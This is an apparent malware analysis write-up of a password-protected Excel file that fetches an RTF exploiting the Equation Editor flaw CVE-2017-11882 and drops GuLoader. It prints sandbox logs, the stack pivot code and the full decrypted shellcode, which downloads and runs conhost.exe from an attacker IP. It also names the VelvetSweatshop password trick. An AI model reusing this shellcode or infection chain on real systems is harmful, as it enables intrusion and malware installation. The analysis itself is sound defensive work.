The sample is excel file with extension .xls.

MD5: 4e9da14a7e07654d673f3785cf58e316

SHA256: 57717904ca09bbae18c3370f06e481a95de630e53a9d8aad52bc7695e8d56a77

VT Link: https://www.virustotal.com/gui/file/cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542

Initial Triage

Let’s detonate the sample in a Windows 11 sandbox and check for malicious activities.

Excel file denoted
Fig 1: Sample denoted in a virtual environment.

Detonating the sample while running noriben.py , we observe the following:

  • Process Activity
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/iccvf"	[Child PID: 5044]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/iccvf"	[Child PID: 5544]
[CreateProcess] svchost.exe:856 > "%ProgramFiles% (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -Embedding"	[Child PID: 10280]
[CreateProcess] EQNEDT32.EXE:10280 > "%AppData%\conhost.exe "	[Child PID: 7608]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/"	[Child PID: 9772]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/"	[Child PID: 10044]
[CreateProcess] svchost.exe:9744 > "rundll32.exe %WinDir%\system32\davclnt.dll,DavSetCookie 23.94.206.104 hxxp://23[.]94[.]206[.]104/"	[Child PID: 6160]

When the file is executed, it downloads a file from 23.94.206.104 which is processed by Equation editor. It then executes a file named conhost.exe. Then, we see connections to 23[.]94[.]206[.]104.

  • File Activity
[CreateFile] EXCEL.EXE:4528 > %LocalAppData%\Microsoft\Windows\INetCache\IE\EOQ0LJX8\microsotballonininsterestedproductwhichlaunchedworldwideforupdaeandupgradethenewthingsonthemarket.doc	[SHA256: cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542]
[CreateFile] EQNEDT32.EXE:10280 > %LocalAppData%\Microsoft\Windows\INetCache\IE\EOQ0LJX8\conhost[1].exe	[SHA256: fa99b97ae8564e4a6a87d79855b665a462a80a9eeabe5b2d2ccc03a5bea52d10]
[CreateFile] EQNEDT32.EXE:10280 > %AppData%\conhost.exe	[SHA256: fa99b97ae8564e4a6a87d79855b665a462a80a9eeabe5b2d2ccc03a5bea52d10]
[DeleteFile] conhost.exe:7608 > %LocalAppData%\Temp\nst3767.tmp
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Sengevders.Pep	[SHA256: 4574e94d0f0a27ba498b63b52c1c8be0f1d10dff8b744d3ca85ccbc3a9909846]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\Kreture.cla	[SHA256: aa29c94affed7df0fb98bf73cf3c80801ba40709d29a10478385eaf449b96bb8]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\Krimsk.hai	[SHA256: 1d44d77a1338511c764d8dfd61098120c448e08a15cbf0d1891dde76ba815566]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Blankovekselen\Sirupskagen\disquiparation.fng	[SHA256: bececeb4b1c87a8a7d2ac196c19b4cd4ad9bbfa62698101b82e0d0c8a763086c]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Embraceor\Skibonits\endosseredes.txt	[SHA256: 7d82d4289f9fedd9d080cd4d1f65a045aa20c022b98dc3840bee141b9b572118]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Embraceor\Skibonits\eskadronen.ups	[SHA256: 7d5604f7815d42a9a432f6836cd7a3c628dd24dbf33995e5dd980a08b69d84e2]
[CreateFile] conhost.exe:7608 > %AppData%\holometabolian\Clinicians\Tagrytteren\Protests\bashfully\zannos.dip	[SHA256: 541ddf79e94f50b04efdb22b8dcb3a3c6e7e72db3c91ca75e27d060047a69e14]
[DeleteFile] conhost.exe:7608 > %LocalAppData%\Temp\nsm4051.tmp
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\laartungerne.lnk	[SHA256: be44eeb508234ea5a0c9b82ccedde7149f0fcf143743bac0f2838c102abff59c]
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\laartungerne.lnk	[SHA256: be44eeb508234ea5a0c9b82ccedde7149f0fcf143743bac0f2838c102abff59c]
[CreateFile] conhost.exe:7608 > %LocalAppData%\Temp\nsm4051.tmp\System.dll	[SHA256: bd046e6497b304e4ea4ab102cab2b1f94ce09bde0eebba4c59942a732679e4eb]`

By examining File Activity, it becomes clear that the file microsotballonininsterestedproductwhichlaunchedworldwideforupdaeandupgradethenewthingsonthemarket.doc is downloaded. Then conhost.exe is downloaded which then creates various files in the temp directory.

  • Network Activity

Running wireshark in background, we can capture network connection made to 23[.]94[.]206[.]104 which shows rtf file and a exe file being downloaded.

RTF File seen in wireshark
Fig 2: Downloads a rtf file from 23[.]94[.]206[.]104
conhost.exe seen in wireshark
Fig 3: Downloads conhost.exe from 23[.]94[.]206[.]104

Further communication observed :

connection seen
Fig 4: Further communication to 23[.]94[.]206[.]104

From observing process, file and network, we see the following steps being taken when xls file is executed:

  • Downloads an rtf file from 23[.]94[.]206[.]104
  • Equation editor parses the rtf file which triggers the vulnerability.
  • It downloads an exe file from 23[.]94[.]206[.]104
  • Exe file writes itself to tmp folder and makes connection to 23[.]94[.]206[.]104
  • However, its execution is stopped since it detected that it is running in VM.

Digging deeper

Excel File

The excel file can be analyzed using ole tools such as oledump and oledir.

Output of Oledir.
Fig 5: Oledir mentions a stream exploiting a known vulnerability.
Output from OleDir shows a stream containing suspicious code in it. We can dump it later and examine the code.

Xls file being password protected
Fig 6: Xls file is password protected.

From Oletools, it is clear that the excel file is password protected. It doesn’t contain macro code in it. To make the analysis easier, we can use msoffcrypto-crack.py to decrypt the file. In most cases, excel files use VelvetSweatshop as the default password to ensure that the malicious code is executed when opened.

Default password of the file.
Fig 7: Password is VelvetSweatshop.
Output of Oledump
Fig 8: We can use oledump which shows the password flag is now removed.
Stream dump of the url.
Fig 9: Stream shows a url string from 23[.]94[.]206[.]104 downloading a doc file.

We can use strings to see a clear url :

The url that is downloading doc
Fig 10: The url which downloads the file.

This string can be seen in Fig 2 which downloads RTF File.

RTF File

RTF file downloaded from 23[.]94[.]206[.]104

MD5: bcf1451b6bb1a36c12a0abf8f4875cd4

SHA256: cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542

VT Link: https://www.virustotal.com/gui/file/cb00d3350e6066cf050eef8d7949d1a268a365d68e5ff8b3970607ad1ff2c542

We can see the CSLID of equation editor in RTF File which ensures that the file is processed by equation editor.

Equation editor bytes.
Fig 11: Highlighted Bytes displays the CSLID of the equation editor.

Checking with rtfdump tool, an object is clearing shown :

Object in RTF File.
Fig 12: Object in RTF File.

To dump this object, we can use rtfobj tool :

Object dumped from rtf
Fig 13: Object dumped from RTF File.

This object would most likely contain a shellcode that is executed once when the vulnerability in Equation Editor is exploited. To find the shellcode, there are certain tricks to find certain patterns however they don’t always work. We can use scdbg to find the shellcode.

Shellcode
Fig 14: Shellcode found in the dumped object.

It is clear from the output that the shellcode downloads conhost.exe from 23[.]94[.]206[.]104

Shellcode analysis

The output from the scdbg doesn’t give the full picture. We can use x64dbg to dump the shellcode properly.

In order to debug equation editor, we need to create an entry under the registry : Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options with the name as eqnedt32.exe

Once it is created, we can create a key named debugger and set its value to the path of x64dbg executable.

This will ensure that once equation editor is executed, it is spawned under a debugger.

After spending some time, we are able to extract the shellcode.

Exploitation of vulnerability

This exploit has been analyzed thoroughly. One can refer the below blogs for more insights:

  1. Unit42: ​​https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/
  2. LastLine: ​https://www.lastline.com/labsblog/evading-static-analyzers-by-solving-the-equation-editor/
  3. QuickHeal: ​https://blogs.quickheal.com/obfuscated-equation-editor-exploit-cve-2017-11882-spreading-hawkeye-keylogger/

Equation editor doesn’t have DEP and ASLR so the addresses do not change. While analyzing this sample, the function 0x0041160F gets invoked twice. Initially the function is called from 0x00411349 and then from 0x004115D3 at which point the exploit is triggered. The function returns to the exploit code written onto the stack as shown below.

The code written onto the stack which jumps to the shellcode :

0019ECB4 | B8 FDBDD749              | mov eax,49D7BDFD                        |
0019ECB9 | 25 3CBF4526              | and eax,2645BF3C                        |
0019ECBE | 8B18                     | mov ebx,dword ptr ds:[eax]              |
0019ECC0 | 8B33                     | mov esi,dword ptr ds:[ebx]              | 
0019ECC2 | BA CEC6F8D4              | mov edx,D4F8C6CE                        | 
0019ECC7 | 81F2 7EA1BED4            | xor edx,D4BEA17E                        | 
0019ECCD | 8B12                     | mov edx,dword ptr ds:[edx]              | 
0019ECCF | 56                       | push esi                                |
0019ECD0 | FFD2                     | call edx                                |
0019ECD2 | 05 3A819EF2              | add eax,F29E813A                        |
0019ECD7 | 05 557F610D              | add eax,D617F55                         |
0019ECDC | FFE0                     | jmp eax                                 |

The above code gets the starting address of global memory region where the user crafted rtf file is stored. It then calculates the starting point of the shellcode and begins the execution.

The initial routine of the shellcode decrypts the rest of the shellcode and jumps to it which is shown below:

pop eax #contains the starting address of the shellcode
add eax,259
lea ebx, dword ptr ds:[eax+281]
imul ecx,ecx,0
imul ecx,ecx,C231DF5  #loc_a
add ecx,CD5B387
pushfd
 push eax                              
 add eax,48A0                         
 lea eax,dword ptr ds:[eax+2795]         
 sub eax,14F3                           
 lea eax,dword ptr ds:[eax+22A3]        
 pop eax                                 
 popfd                   
xor dword ptr ds:[eax],ecx
add eax,4
cmp eax,ebx
jb  loc_a
sub esp,22C 
call 4e31489  # Execution from the decrypted portion

After letting the decrypting routine run, we can dump the shellcode and analyze in ghidra. Data and code is mixed together making it difficult for decompiler. By carefully analyzing it, we can separate the data and code in it.

Cleaned and decrypted shellcode:

                            LAB_00000464                                    XREF[2]:     0000038d(j), 0000043c(j)  
        00000464 39 d8           CMP        EAX,EBX
        00000466 0f 82 b7        JC         LAB_00000323
                 fe ff ff
        0000046c 81 ec 2c        SUB        ESP,0x22c
                 02 00 00
        00000472 e8 12 00        CALL       FUN_00000489                                     undefined FUN_00000489()
                 00 00
        00000477 6b 00 65        unicode    u"kernel32"
                 00 72 00 
                 6e 00 65 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000489()
            
                             FUN_00000489                                    XREF[1]:     00000472(c)  
        00000489 e8 7b 01        CALL       FUN_00000609                                     undefined FUN_00000609(undefined
                 00 00
        0000048e 89 c3           MOV        EBX,EAX
        00000490 e8 0d 00        CALL       FUN_000004a2                                     undefined FUN_000004a2()
                 00 00
        00000495 4c 6f 61        ds         "LoadLibraryW"
                 64 4c 69 
                 62 72 61 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000004a2()
             
                             FUN_000004a2                                    XREF[1]:     FUN_00000489:00000490(c)  
        000004a2 53              PUSH       EBX
        000004a3 e8 da 01        CALL       FUN_00000682                                     undefined FUN_00000682(undefined
                 00 00
        000004a8 89 c7           MOV        EDI,EAX
        000004aa e8 0f 00        CALL       FUN_000004be                                     undefined FUN_000004be()
                 00 00
        000004af 47 65 74        ds         "GetProcAddress"
                 50 72 6f 
                 63 41 64 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000004be()
             
                             FUN_000004be                                    XREF[1]:     FUN_000004a2:000004aa(c)  
        000004be 53              PUSH       EBX
        000004bf e8 be 01        CALL       FUN_00000682                                     undefined FUN_00000682(undefined
                 00 00
        000004c4 89 c6           MOV        ESI,EAX
        000004c6 e8 1a 00        CALL       FUN_000004e5                                     undefined FUN_000004e5()
                 00 00
        000004cb 45 78 70        ds         "ExpandEnvironmentStringsW"
                 61 6e 64 
                 45 6e 76 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000004e5()
             
                             FUN_000004e5                                    XREF[1]:     FUN_000004be:000004c6(c)  
        000004e5 53              PUSH       EBX
        000004e6 ff d6           CALL       ESI
        000004e8 68 04 01        PUSH       0x104
                 00 00
        000004ed 8d 54 24 08     LEA        EDX,[ESP + 0x8]
        000004f1 52              PUSH       EDX
        000004f2 e8 2c 00        CALL       FUN_00000523                                     undefined FUN_00000523()
                 00 00
        000004f7 25 00 41        unicode    u"%APPDATA%\\conhost.exe"
                 00 50 00 
                 50 00 44 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000523()
             
                             FUN_00000523                                    XREF[1]:     FUN_000004e5:000004f2(c)  
        00000523 ff d0           CALL       EAX
        00000525 e8 0e 00        CALL       FUN_00000538                                     undefined FUN_00000538()
                 00 00
        0000052a 55 00 72        unicode    u"UrlMon"
                 00 6c 00 
                 4d 00 6f 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000538()
             
                             FUN_00000538                                    XREF[1]:     FUN_00000523:00000525(c)  
        00000538 ff d7           CALL       EDI
        0000053a e8 13 00        CALL       FUN_00000552                                     undefined FUN_00000552()
                 00 00
        0000053f 55 52 4c        ds         "URLDownloadToFileW"
                 44 6f 77 
                 6e 6c 6f 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000552()
             
                             FUN_00000552                                    XREF[1]:     FUN_00000538:0000053a(c)  
        00000552 50              PUSH       EAX
        00000553 ff d6           CALL       ESI
        00000555 6a 00           PUSH       0x0
        00000557 6a 00           PUSH       0x0
        00000559 8d 54 24 0c     LEA        EDX,[ESP + 0xc]
        0000055d 52              PUSH       EDX
        0000055e e8 4c 00        CALL       FUN_000005af                                     undefined FUN_000005af()
                 00 00
        00000563 68 00 74        unicode    u"http://23.94.206.104/9080/conhost.exe"
                 00 74 00 
                 70 00 3a 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000005af()
             
                             FUN_000005af                                    XREF[1]:     FUN_00000552:0000055e(c)  
        000005af 6a 00           PUSH       0x0
        000005b1 ff d0           CALL       EAX
        000005b3 e8 10 00        CALL       FUN_000005c8                                     undefined FUN_000005c8()
                 00 00
        000005b8 73 00 68        unicode    u"shell32"
                 00 65 00 
                 6c 00 6c 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000005c8()
             
                             FUN_000005c8                                    XREF[1]:     FUN_000005af:000005b3(c)  
        000005c8 ff d7           CALL       EDI
        000005ca e8 0e 00        CALL       FUN_000005dd                                     undefined FUN_000005dd()
                 00 00
        000005cf 53 68 65        ds         "ShellExecuteW"
                 6c 6c 45 
                 78 65 63 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_000005dd()
             
                             FUN_000005dd                                    XREF[1]:     FUN_000005c8:000005ca(c)  
        000005dd 50              PUSH       EAX
        000005de ff d6           CALL       ESI
        000005e0 6a 01           PUSH       0x1
        000005e2 6a 00           PUSH       0x0
        000005e4 6a 00           PUSH       0x0
        000005e6 8d 54 24 10     LEA        EDX,[ESP + 0x10]
        000005ea 52              PUSH       EDX
        000005eb 6a 00           PUSH       0x0
        000005ed 6a 00           PUSH       0x0
        000005ef ff d0           CALL       EAX
        000005f1 e8 0c 00        CALL       FUN_00000602                                     undefined FUN_00000602()
                 00 00
        000005f6 45 78 69        ds         "ExitProcess"
                 74 50 72 
                 6f 63 65 
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000602()
             
                             FUN_00000602                                    XREF[1]:     FUN_000005dd:000005f1(c)  
        00000602 53              PUSH       EBX
        00000603 ff d6           CALL       ESI
        00000605 6a 00           PUSH       0x0
        00000607 ff d0           CALL       EAX

The above part of shellcode when executed performs the same actions shown in Fig 14.

The shellcode also contains 3 further sub-routines that performs API Hashing :

                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000609(undefined4 param_1)
             
             undefined4        Stack[0x4]:4   param_1                                 XREF[1]:     0000061d(R)  
                             FUN_00000609                                    XREF[1]:     FUN_00000489:00000489(c)  
        00000609 52              PUSH       EDX
        0000060a 64 8b 15        MOV        EDX,dword ptr FS:[0x30]
                 30 00 00 00
        00000611 8b 52 0c        MOV        EDX,dword ptr [EDX + 0xc]
        00000614 83 c2 0c        ADD        EDX,0xc
                             LAB_00000617                                    XREF[1]:     00000628(j)  
        00000617 8b 12           MOV        EDX,dword ptr [EDX]
        00000619 8b 4a 30        MOV        ECX,dword ptr [EDX + 0x30]
        0000061c 51              PUSH       ECX
        0000061d ff 74 24 0c     PUSH       dword ptr [ESP + param_1]
        00000621 e8 0b 00        CALL       FUN_00000631                                     undefined FUN_00000631(undefined
                 00 00
        00000626 85 c0           TEST       EAX,EAX
        00000628 74 ed           JZ         LAB_00000617
        0000062a 8b 42 18        MOV        EAX,dword ptr [EDX + 0x18]
        0000062d 5a              POP        EDX
        0000062e c2 04 00        RET        0x4
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000631(undefined4 param_1, undefined4 pa
             
             undefined4        Stack[0x4]:4   param_1                                 XREF[1]:     00000632(R)  
             undefined4        Stack[0x8]:4   param_2                                 XREF[1]:     00000636(R)  
                             FUN_00000631                                    XREF[1]:     FUN_00000609:00000621(c)  
        00000631 52              PUSH       EDX
        00000632 8b 4c 24 08     MOV        ECX,dword ptr [ESP + param_1]
        00000636 8b 54 24 0c     MOV        EDX,dword ptr [ESP + param_2]
        0000063a 0f b6 01        MOVZX      EAX,byte ptr [ECX]
                             LAB_0000063d                                    XREF[1]:     00000679(j)  
        0000063d 66 85 c0        TEST       AX,AX
        00000640 74 39           JZ         LAB_0000067b
        00000642 66 3b 02        CMP        AX,word ptr [EDX]
        00000645 74 29           JZ         LAB_00000670
        00000647 66 83 f8 61     CMP        AX,'a'
        0000064b 72 06           JC         LAB_00000653
        0000064d 66 83 f8 7a     CMP        AX,'z'
        00000651 76 0c           JBE        LAB_0000065f
                             LAB_00000653                                    XREF[1]:     0000064b(j)  
        00000653 66 83 f8 41     CMP        AX,'A'
        00000657 72 13           JC         LAB_0000066c
        00000659 66 83 f8 5a     CMP        AX,'Z'
        0000065d 77 0d           JA         LAB_0000066c
                             LAB_0000065f                                    XREF[1]:     00000651(j)  
        0000065f 66 83 f0 20     XOR        AX,0x20
        00000663 66 3b 02        CMP        AX,word ptr [EDX]
        00000666 74 02           JZ         LAB_0000066a
        00000668 eb 02           JMP        LAB_0000066c
                             LAB_0000066a                                    XREF[1]:     00000666(j)  
        0000066a eb 04           JMP        LAB_00000670
                             LAB_0000066c                                    XREF[3]:     00000657(j), 0000065d(j), 
                                                                                          00000668(j)  
        0000066c 31 c0           XOR        EAX,EAX
        0000066e eb 0e           JMP        LAB_0000067e
                             LAB_00000670                                    XREF[2]:     00000645(j), 0000066a(j)  
        00000670 83 c1 02        ADD        ECX,0x2
        00000673 83 c2 02        ADD        EDX,0x2
        00000676 0f b6 01        MOVZX      EAX,byte ptr [ECX]
        00000679 eb c2           JMP        LAB_0000063d
                             LAB_0000067b                                    XREF[1]:     00000640(j)  
        0000067b 83 c8 01        OR         EAX,0x1
                             LAB_0000067e                                    XREF[1]:     0000066e(j)  
        0000067e 5a              POP        EDX
        0000067f c2 08 00        RET        0x8
                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined FUN_00000682(undefined4 param_1, undefined4 pa
            
             undefined4        Stack[0x4]:4   param_1                                 XREF[1]:     00000686(R)  
             undefined4        Stack[0x8]:4   param_2                                 XREF[1]:     000006ad(R)  
                             FUN_00000682                                    XREF[2]:     FUN_000004a2:000004a3(c), 
                                                                                          FUN_000004be:000004bf(c)  
        00000682 53              PUSH       EBX
        00000683 52              PUSH       EDX
        00000684 56              PUSH       ESI
        00000685 57              PUSH       EDI
        00000686 8b 54 24 14     MOV        EDX,dword ptr [ESP + param_1]
        0000068a 8b 42 3c        MOV        EAX,dword ptr [EDX + 0x3c]
        0000068d 8d 44 02 78     LEA        EAX,[EDX + EAX*0x1 + 0x78]
        00000691 8b 00           MOV        EAX,dword ptr [EAX]
        00000693 01 d0           ADD        EAX,EDX
        00000695 50              PUSH       EAX
        00000696 8b 48 18        MOV        ECX,dword ptr [EAX + 0x18]
        00000699 8b 58 20        MOV        EBX,dword ptr [EAX + 0x20]
        0000069c 01 d3           ADD        EBX,EDX
        0000069e 30 c0           XOR        AL,AL
                             LAB_000006a0                                    XREF[1]:     000006df(j)  
        000006a0 85 c9           TEST       ECX,ECX
        000006a2 74 3d           JZ         LAB_000006e1
        000006a4 51              PUSH       ECX
        000006a5 8b 0b           MOV        ECX,dword ptr [EBX]
        000006a7 8d 0c 11        LEA        ECX,[ECX + EDX*0x1]
        000006aa 89 cf           MOV        EDI,ECX
        000006ac 57              PUSH       EDI
        000006ad 8b 74 24 24     MOV        ESI,dword ptr [ESP + param_2]
        000006b1 31 c9           XOR        ECX,ECX
        000006b3 49              DEC        ECX
        000006b4 f2 ae           SCASB.RE   ES:EDI
        000006b6 f7 d1           NOT        ECX
        000006b8 5f              POP        EDI
        000006b9 f3 a6           CMPSB.REPE ES:EDI,ESI
        000006bb 75 1d           JNZ        LAB_000006da
        000006bd 59              POP        ECX
        000006be 58              POP        EAX
        000006bf 2b 48 18        SUB        ECX,dword ptr [EAX + 0x18]
        000006c2 f7 d9           NEG        ECX
        000006c4 8b 58 24        MOV        EBX,dword ptr [EAX + 0x24]
        000006c7 01 d3           ADD        EBX,EDX
        000006c9 0f b7 1c 4b     MOVZX      EBX,word ptr [EBX + ECX*0x2]
        000006cd 8b 40 1c        MOV        EAX,dword ptr [EAX + 0x1c]
        000006d0 8d 04 98        LEA        EAX,[EAX + EBX*0x4]
        000006d3 8b 04 10        MOV        EAX,dword ptr [EAX + EDX*0x1]
        000006d6 01 d0           ADD        EAX,EDX
        000006d8 eb 0c           JMP        LAB_000006e6
                             LAB_000006da                                    XREF[1]:     000006bb(j)  
        000006da 83 c3 04        ADD        EBX,0x4
        000006dd 59              POP        ECX
        000006de 49              DEC        ECX
        000006df eb bf           JMP        LAB_000006a0
                             LAB_000006e1                                    XREF[1]:     000006a2(j)  
        000006e1 31 c0           XOR        EAX,EAX
        000006e3 83 c4 04        ADD        ESP,0x4
                             LAB_000006e6                                    XREF[1]:     000006d8(j)  
        000006e6 5f              POP        EDI
        000006e7 5e              POP        ESI
        000006e8 5a              POP        EDX
        000006e9 5b              POP        EBX
        000006ea c2 08 00        RET        0x8
        000006ed 6e 3d d4

Once the shellcode is finished executing, it drops the file conhost.exe in tmp folder.

conhost.exe

MD5: 8ae5d58be1f0e18dcf150b83939c0f00

SHA256: 5c402005820d458af51125cc3fde9c0870a321ad314fa4a8de2f7dea382bdd6b

VT Link: https://www.virustotal.com/gui/file/5c402005820d458af51125cc3fde9c0870a321ad314fa4a8de2f7dea382bdd6b

A preliminary analysis of the file shows that it is a NSIS-Installer which executes a shellcode. The file appears to be GuLoader malware which deserves its own sepearate blog.